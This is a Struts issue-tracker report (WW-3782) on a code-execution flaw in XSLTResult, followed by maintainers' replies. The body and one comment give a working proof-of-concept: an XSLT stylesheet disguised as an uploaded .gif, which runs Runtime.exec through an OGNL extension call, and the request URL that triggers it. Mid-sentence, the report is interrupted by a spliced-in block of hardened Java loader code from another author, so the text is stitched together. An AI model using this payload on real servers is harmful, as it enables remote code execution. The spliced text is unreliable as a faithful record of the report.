Struts 2
WW-3782

Struts 2 framework XSLTResult local file code execution vulnerability

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Minor
    • Resolution: Not a Problem
    • Affects Version/s: 2.3.1.2
    • Fix Version/s: 2.3.3
    • Component/s: Core Actions
    • Flags: Patch

      Description

      http://www.inbreak.net/archives/319

      Reporter : kxlzx , Alibaba Security Team
      http://www.inbreak.net/
      Struts 2 allows an action to have several result types, one of which is the XSLT type. This type accepts a file location submitted by the user and parses that file as an XSLT stylesheet, regardless of its extension.

      This is the XSLTResult source code:

      http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
      // Read the user-supplied value of the "xslt.location" request parameter
      String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
      path = pathFromRequest;
      // Resolve it as a resource of the web application, with no validation of the path
      URL resource = ServletActionContext.getServletContext().getResource(path);
      // Parse the file at the user-supplied location as an XSLT stylesheet
      templates = factory.newTemplates(new StreamSource(resource.openStream()));

      Because of this code, as soon as any action in the project uses xsltResult, an attacker can make the application parse a file the attacker uploaded as an XSLT stylesheet.

      Example of an action that uses xsltResult:
      <action name="xslt" class="net.inbreak.xsltAction">
      <result type="xslt"/>
      </action>

      XSLT processing allows Java static methods to be executed, so the attacker only needs to upload a file to the server,

      for example:

      /upload/7758521.gif

      <?xml version="1.0" encoding="UTF-8" ?>
      <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      version="1.0" xmlns:ognl="ognl.Ognl">
      <xsl:template match="/">
      <html>
      <body>
      <h2>hacked by kxlzx</h2>
      <h2>http://www.inbreak.net</h2>
      <exp>
      <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
      </exp>
      </body>
      </html>
      </xsl:template>
      </xsl:stylesheet>

      When this xsl file is parsed, it invokes the OGNL call
      ognl:getValue('@Runtime@getRuntime().exec("calc")', '')

      which leads to arbitrary code execution.

      If the URL of an action returning an XSLT result is

      http://www.inbreak.net/xslt.action

      then the attacker can submit

      http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

      and it then becomes
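      As an added example (not code from the Struts project or from the reporter), here is a hardened way to load the stylesheet for the code path quoted above: the stylesheet name comes from action configuration rather than the request and must match an allow-listed file under a fixed server-side directory, and the TransformerFactory runs with secure processing enabled so the JDK's built-in XSLTC rejects extension-function calls such as ognl:getValue when it compiles the stylesheet. Assumed: the servlet API on the classpath, the /WEB-INF/xslt/ directory, and the SafeXsltLoader and isAllowedName names, all of which are hypothetical.

```java
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Set;
import javax.servlet.ServletContext;
import javax.xml.XMLConstants;
import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamSource;

// Added example, not the Struts XSLTResult source. Two independent controls:
// the stylesheet name comes from action configuration (never the request) and
// must be an allow-listed file under STYLESHEET_DIR; and secure processing is
// enabled so the JDK's XSLTC rejects extension functions such as ognl:getValue.
public final class SafeXsltLoader {
    // Hypothetical server-side directory holding the deployed stylesheets.
    private static final String STYLESHEET_DIR = "/WEB-INF/xslt/";
    private final Set<String> allowed; // fixed at deploy time, e.g. Set.of("report.xsl")

    public SafeXsltLoader(Set<String> allowedStylesheetNames) {
        this.allowed = Set.copyOf(allowedStylesheetNames);
    }

    // True only for a bare, allow-listed "*.xsl" name with no directory
    // separators, so "upload/7758521.gif", "../x.xsl" and "/x.xsl" are rejected
    // even if someone mistakenly adds such an entry to the allow-list.
    static boolean isAllowedName(Set<String> allowed, String name) {
        if (name == null || !name.endsWith(".xsl") || !allowed.contains(name)) return false;
        Path p = Paths.get(name);
        return p.getNameCount() == 1 && p.getFileName().toString().equals(name);
    }

    public Templates load(ServletContext ctx, String configuredName)
            throws IOException, TransformerConfigurationException {
        if (!isAllowedName(allowed, configuredName)) {
            throw new IllegalArgumentException("stylesheet not allow-listed: " + configuredName);
        }
        URL resource = ctx.getResource(STYLESHEET_DIR + configuredName);
        if (resource == null) throw new IOException("stylesheet missing: " + configuredName);
        TransformerFactory factory = TransformerFactory.newInstance();
        // With secure processing on, XSLTC refuses stylesheets that call Java extension functions.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        try (InputStream in = resource.openStream()) {
            return factory.newTemplates(new StreamSource(in));
        }
    }
}
```

      The secure-processing control depends on which TransformerFactory implementation is actually loaded in the application; the allow-list check does not, so keep both.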

        Activity

        zhouyanming added a comment -

        Dude, this is too much; the Celestial Empire hasn't conquered the whole world yet.
        kxlzx added a comment -

        Previously I was always the one using Google Translate; this time I recommend it to everyone.

        If you can not read, open here.

        http://translate.google.com/#zh-CN|en|%E5%A6%82%E6%9E%9C%E4%BD%A0%E7%9C%8B%E4%B8%8D%E6%87%82%EF%BC%8C%E8%AF%B7%E6%89%93%E5%BC%80%E8%BF%99%E9%87%8C%E3%80%82
        Lukasz Lenart added a comment -

        What is the problem?

        If you can not read, open here.

        http://translate.google.com/#pl|zh-CN|W%20czym%20jest%20problem%20%3F
        kxlzx added a comment -

        An attacker can upload an image file and execute arbitrary code.

        If you can not read, open here.

        http://translate.google.cn/?hl=en#zh-CN|en|%E6%94%BB%E5%87%BB%E8%80%85%E5%8F%AF%E4%BB%A5%E4%B8%8A%E4%BC%A0%E5%9B%BE%E7%89%87%E6%96%87%E4%BB%B6%EF%BC%8C%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81
        Lukasz Lenart added a comment -

        First you're talking about some file upload issue with the XSLT plugin, next you're presenting some hardcoded code with a call to static methods (which can be blocked by setting up a configuration flag).

        And first of all, please report any security issues through security@struts.apache.org

        Lukasz Lenart added a comment -

        You mean that your application is taking a user file and uses it as an input for XSLT Result? Without checking the content of the file? XSLT Result was designed to be based on server-side files and not to use any file uploaded by an accidental user.

        It's exactly the same case when you aren't escaping input form parameters and use them directly in your SQL queries - it's called SQL injection.

        kxlzx added a comment -

        If an application's code is like:
        <action name="xslt" class="net.inbreak.xsltAction">
        <result type="xslt"/>
        </action>

        then the attacker can upload a file:

        /upload/7758521.gif

        <?xml version="1.0" encoding="UTF-8" ?>
        <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
        version="1.0" xmlns:ognl="ognl.Ognl">
        <xsl:template match="/">
        <html>
        <body>
        <h2>hacked by kxlzx</h2>
        <h2>http://www.inbreak.net</h2>
        <exp>
        <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
        </exp>
        </body>
        </html>
        </xsl:template>
        </xsl:stylesheet>

        and open the URL
        http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

        then the application will execute
        ognl:getValue('@Runtime@getRuntime().exec("calc")', '')

        So, if an application uses the XSLT result, there is a local code execution vulnerability.

        Rene Gielen added a comment -

        In this case, the application developer is responsible for validating and securing user input / upload before processing. Evaluating expressions is the core feature in XSLT result, as it is in Freemarker etc., and it is designed for templates that reside on the server side.


          People

          • Assignee: Unassigned
          • Reporter: kxlzx
